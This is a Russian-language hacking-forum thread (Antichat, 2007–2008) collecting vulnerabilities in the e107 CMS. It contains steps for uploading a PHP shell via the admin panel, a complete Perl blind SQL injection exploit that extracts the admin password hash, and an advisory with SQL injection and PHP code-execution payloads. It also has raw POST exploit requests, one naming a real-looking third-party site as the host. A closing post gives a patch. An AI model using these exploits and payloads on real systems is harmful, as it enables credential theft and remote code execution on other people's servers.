ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу [ Обзор уязвимостей e107 cms ]
   
Ответ
Страница 1 из 6 1 2 3 4 5 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

[ Обзор уязвимостей e107 cms ]
  #1  
Старый 16.08.2007, 19:18
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию [ Обзор уязвимостей e107 cms ]
САБЖ
Последний раз редактировалось Elekt; 27.07.2008 в 02:35..
 
Ответить с цитированием

Загрузка шела в e107 cms
  #2  
Старый 16.08.2007, 19:47
Аватар для ettee
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию Загрузка шела в e107 cms
Админка: " Зайгрузки файлов пользователями ": разрешаем загружать загрузки +"нормальный файл", добавляем " .php " в "Разрешённые типы файлов".
В меню появляются "Загрузка", заливаем файл.
target/e107_files/public/file.php +посмотреть полный путь можно через админ панель категория " Зайгрузки файлов пользователями "
Последний раз редактировалось Elekt; 27.07.2008 в 02:36..
 
Ответить с цитированием

Загрузка шела e107 cms
  #3  
Старый 04.07.2008, 13:23
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию Загрузка шела e107 cms
вот типа такого, но можно и без таблиц))но
надо знать диру для записи:

Цитата:
http://forum.antichat.ru/showpost.php?p=197748&postcount=22

http://forum.antichat.ru/showpost.php?p=83065&postcount=2
Последний раз редактировалось Elekt; 27.07.2008 в 02:37..
 
Ответить с цитированием

  #4  
Старый 30.07.2008, 12:51
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl 
#####################################################################################
#         e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit                  #
#                           ..::virangar security team::..                          #
#                              www.virangar.net                                     #
#                 C0d3d BY:virangar security team ( hadihadi  )                     #
#special tnx to:                                                                    #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra                                     #
#& all virangar members & all hackerz                                               #
# my lovely friends hadi_aryaie2004 & arash(imm02tal)                               #
#             ..:::Young Iranina Hackerz::..                                        #
#####################################################################################
#[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod  ;) 
#this code is for english e107's only,if you want work on other languages,you can edit line 67;)

use HTTP::Request;
use LWP::UserAgent;

if (@ARGV != 1){
header();
}

$host = $ARGV[0];

print "\n md5 Password:\r\n";
&halghe();
print "\n[+]Done\n";


sub halghe {
for($i = 1; $i <= 32; $i++){
 $f = 0;
 $n = 48;
 while(!$f && $n <= 57)
 {
  if(&inject($host, $i, $n,)){
 $f = 1;
     syswrite(STDOUT, chr($n), 1);
   }
$n++;
}
if(!$f){ 
$n=97;
while(!$f && $n <= 102)
 {
  if(&inject($host, $i, $n,)){
 $f = 1;
     syswrite(STDOUT, chr($n), 1);
   }
$n++;
}}
}
}
sub inject {
my $site = $_[0];
my $a = $_[1];
my $b = $_[2];

$col = "user_password";

$attack= "$site"."%20and%20substring((select%20"."$col"."%20from%20e107_user%20where%20user_id=1%20limit%200,1),"."$a".",1)=char("."$b".")/*";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content;

if ($res !~ /The user has hidden their blog./i){
    return 1;
}

}
sub header {
print qq{
###################################################################
# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit        #
#                  (just for english e107's)                      #
#                      www.virangar.net                           #
#   Useage: perl $0 Host                                          #
#                                                                 #
#   Host: full patch to macgurublog.php+uid (dont forget http://) #
#                                                                 #
#  Example:                                                       #
# perl $0 http://site/macgurublog_menu/macgurublog.php?uid=5      #
#                                                                 #
###################################################################
};
}

# milw0rm.com [2008-07-29]
 
Ответить с цитированием

  #5  
Старый 06.08.2008, 16:54
Аватар для M4g
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673

Репутация: 784
Отправить сообщение для M4g с помощью ICQ
По умолчанию
>Эксплоит автора, который пожелал остаться неизвестным (действует в e107 0.7.8 точно, возможно, и других тоже)
это мой)
 
Ответить с цитированием

  #6  
Старый 10.08.2008, 02:59
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию
Description: e107 versions 0.7.11 and below suffer from an arbitrary variable overwriting vulnerability.

Код:
##########################################################
# GulfTech Security Research              August 07, 2008
##########################################################
# Vendor : Steve Dunstan
# URL : http://www.e107.org/
# Version : e107 <= 0.7.11
# Risk : Arbitrary Variable Overwriting
##########################################################


Description:
e107 is a popular full featured content management system written
in php. Unfortunately e107 suffers from an arbitrary variable
overwriting issue within it's download.php file that allows a number
of possible attacks to happen including, but possibly not limited to,
arbitrary php code execution and SQL Injection. No authentication
is required to exploit the issue and it can be exploited regardless
of php magic quotes settings. All users are encouraged to upgrade
their e107 installations as soon as possible.


Arbitrary Variable Overwriting:
There is an arbitrary variable overwrite issue in download.php that
is the result of unsafe usage of the php extract() function. Let's
have a look at the code located in download.php @ lines 85-86

case 'list' :	// Category-based listing
if (isset($_POST['view'])) extract($_POST);

As we see from the above code it is very much possible to overwrite
any variables declared up to this point, but what is the real risk
here? What attacks are possible because of this issue?

view=1&id=-99') UNION SELECT concat(user_name,char(58), user_password),
2,3,4 FROM e107_user WHERE user_id=1/*

One possible attack could involve an attacker sending a post request
to the downloads category view page (download.php?list.1 for example)
with the above data as the post contents, and as a result the username
and pass hash will be displayed in the page title. This SQL Injection
does require magic quotes to be set to it's default value of off.

view=1&action=maincats&execute=aWQ=&template_load_core=echo%20exec
(base64_decode($_POST[execute]));

In addition to the SQL Injection is an arbitrary php code execution
vulnerability. I found that it is possible to execute arbitrary php
code by sending a post request to the downloads category view page
with the above data as the post contents. The above example will
successfully execute the "id" shell command regardless if php magic
quotes gpc settings. A valid download category must be available
though, but this is trivial since an attacker can use the previously
explained SQL Injection to gain admin credentials and add a download
category. Other attacks may be possible though since a majority of
the important variables within the script are at risk.

Solution:
A fix for the issue mentioned in this advisory can be found in the 
public e107 CVS repository, or accessed directly at the link below.

http://e107.cvs.sourceforge.net/e107/e107_0.7/download.php?r1=1.95&r2=1.96&view=patch&pathrev=MAIN

Credits:
James Bercegay of the GulfTech Security Research Team

Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00122-08072008
 
Ответить с цитированием

  #7  
Старый 11.08.2008, 19:39
Аватар для chekist
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию
view=1&action=maincats&execute=aWQ=&template_load_ core=echo%20exec
(base64_decode($_POST[execute]));

при таком запросе работать не будет, наверно сделали защиту от скрипткидисов

view=1&action=list&template_load_core=phpinfo();

скуль фигня самое страшно php-injection

PHP код:
$template_load_core ' ..... ';
....
switch ($action)
  {
    case 'list' :
      if (isset($_POST['view'])) extract($_POST);
                    if ($sql->db_Select("download_category""download_category_name,download_category_description,download_category_parent,download_category_class""(download_category_id='{$id}') AND (download_category_class IN (".USERCLASS_LIST."))") )
      { 
...
eval($template_load_core); 
рабочий запрос если в download.php есть хоть одна статья
Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0
User-Agent: Opera (Windows NT 5.1; U; si)
Host: www.tarotclub.fr
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
If-None-Match: c858d46e89d4dfb6fcf8add468b46abb
Cookie: e107_tdOffset=7; e107_tdSetTime=1218466444; e107_tzOffset=-240
Cookie2: $Version=1
Proxy-Connection: close

view=1&id=1&template_load_core=phpinfo();
если в download.php нет ниодной статьи и если magic_quotes_gpc OFF можно извратится таким запросом искользуя sql-injection
Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0
User-Agent: Opera (Windows NT 5.1; U; si)
Host: www.tarotclub.fr
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
If-None-Match: c858d46e89d4dfb6fcf8add468b46abb
Cookie: e107_tdOffset=7; e107_tdSetTime=1218466444; e107_tzOffset=-240
Cookie2: $Version=1
Proxy-Connection: close

view=1&id=0')/*1*/union/*1*/select/*1*/1,2,3,4/*&template_load_core=phpinfo();
ЗЫ сплойт выкладывать не стал т.к. уже не актуально в e107 апдейт работает хорошо, через пару дней уязвимых сайтов почти не останется, эту багу нашёл 10.07.08
 
Ответить с цитированием

  #8  
Старый 18.08.2008, 23:27
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
Последний раз редактировалось Nightmarе; 18.08.2008 в 23:32..
 
Ответить с цитированием

  #9  
Старый 19.08.2008, 19:08
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от Nightmarе  
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
А что, работает?

Я не знаю какую версию смотрели авторы, но у меня на локалке как раз заявленная ими v0.7.11_full

Так вот , всё бы хорошо работало, если-бы там был eval() , но там его нет

И кстати. если бы он там был, никакие SQL типа:
Цитата:
id=0')/*1*/union/*1*/select/*1*/1,2,3,4/*
там-бы нужны не были, достаточно просто постом послать (Разумеется download.php?list):
Цитата:
template_load_core=phpinfo();
Я не знаю, может у меня пропатченная, или авторы смотрели старую, был бы благодарен, если-бы кто-то дал CMS с таким кодом посмотреть.
Последний раз редактировалось jokester; 19.08.2008 в 19:20..
 
Ответить с цитированием

  #10  
Старый 06.09.2008, 20:13
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
Цитата:
Сообщение от Nightmarе  
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
PHP код:
  switch ($action)
  {
    case 'list' :    // Category-based listing
      if (isset($_POST['view'])) extract($_POST); 
PHP код:
 switch ($action)
  {
    case 'list' :    // Category-based listing
      if (isset($_POST['view'])) extract($_POSTEXTR_SKIP); 
 
Ответить с цитированием
Ответ
Страница 1 из 6 1 2 3 4 5 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Сценарии/CMF/СMS 184 15.06.2010 11:10
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Сценарии/CMF/СMS 42 07.05.2010 19:07
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Сценарии/CMF/СMS 20 01.11.2009 14:28
Обзор бесплатных Cms em00s7 PHP, PERL, MySQL, JavaScript 16 03.07.2009 13:13
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ